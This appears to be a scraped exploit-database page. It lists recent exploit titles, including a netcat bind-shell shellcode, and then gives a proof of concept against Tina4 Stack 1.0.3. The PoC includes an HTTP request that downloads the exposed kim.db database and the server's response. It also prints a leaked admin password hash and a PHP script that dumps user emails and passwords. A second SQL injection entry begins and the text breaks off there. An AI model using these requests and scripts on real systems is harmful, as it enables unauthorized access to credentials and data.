
24 changes to exploits/shellcodes CuteFTP Mac 3.1 - Denial of Service (PoC) Evince 3.24.0 - Command Injection Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) xorg-x11-server < 1.20.1 - Local Privilege Escalation Data Center Audit 2.6.2 - 'username' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal Paroiciel 11.20 - 'tRecIdListe' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting Paroiciel 11.20 - 'tRecIdListe' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection Nominas 0.27 - 'username' SQL Injection CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting Surreal ToDo 0.6.1.2 - SQL Injection Surreal ToDo 0.6.1.2 - Local File Inclusion Alienor Web Libre 2.0 - SQL Injection Musicco 2.0.0 - Arbitrary Directory Download Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) Tina4 Stack 1.0.3 - SQL Injection / Database File Download Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) Easyndexer 1.0 - Arbitrary File Download ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) Gumbo CMS 0.99 - SQL Injection Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload) Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin) Webiness Inventory 2.3 - SQL Injection SIPve 0.0.2-R19 - SQL Injection Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
53 lines
No EOL
1.4 KiB
Text
53 lines
No EOL
1.4 KiB
Text
# Exploit Title: Tina4 Stack 1.0.3 - SQL Injection / Database File Download
|
||
# Dork: N/A
|
||
# Date: 2018-11-09
|
||
# Exploit Author: Ihsan Sencan
|
||
# Vendor Homepage: http://tina4.com/
|
||
# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip
|
||
# Version: 1.0.3
|
||
# Category: Webapps
|
||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||
# CVE: N/A
|
||
|
||
# POC:
|
||
# 1)
|
||
# http://localhost/[PATH]/kim.db
|
||
#
|
||
GET /[PATH]/kim.db HTTP/1.1
|
||
Host: TARGET:12345
|
||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: keep-alive
|
||
HTTP/1.1 200 OK
|
||
Server: nginx/1.7.7
|
||
Date: Fri, 09 Nov 2018 17:21:23 GMT
|
||
Content-Type: application/octet-stream
|
||
Content-Length: 22528
|
||
Last-Modified: Fri, 09 Nov 2018 17:09:46 GMT
|
||
Connection: keep-alive
|
||
Etag: "5be5bf5a-5800"
|
||
Accept-Ranges: bytes
|
||
|
||
#
|
||
view-source:kim.db / 3ˆ AdminAdminadmin$2y$10$ATw/7BHxoZezY0UfffIq3.zAn8bzP6NPBpmh9Qmk5e4X8HHOjLAba2018-11-09 15:25:24Active
|
||
|
||
#
|
||
<?php
|
||
|
||
$baglan = new SQLite3('kim.db');
|
||
|
||
$sonuc = $baglan->query('SELECT * FROM user');
|
||
|
||
while ($p = $sonuc->fetchArray()) {?>
|
||
|
||
<h4><?php echo $p['email'];?></h4>
|
||
<h4><?php echo $p['passwd'];?></h4>
|
||
|
||
<?php } ?>
|
||
|
||
# POC:
|
||
# 2)
|
||
# http://localhost/[PATH]/kim/menu/get/1 [SQL]
|
||
# |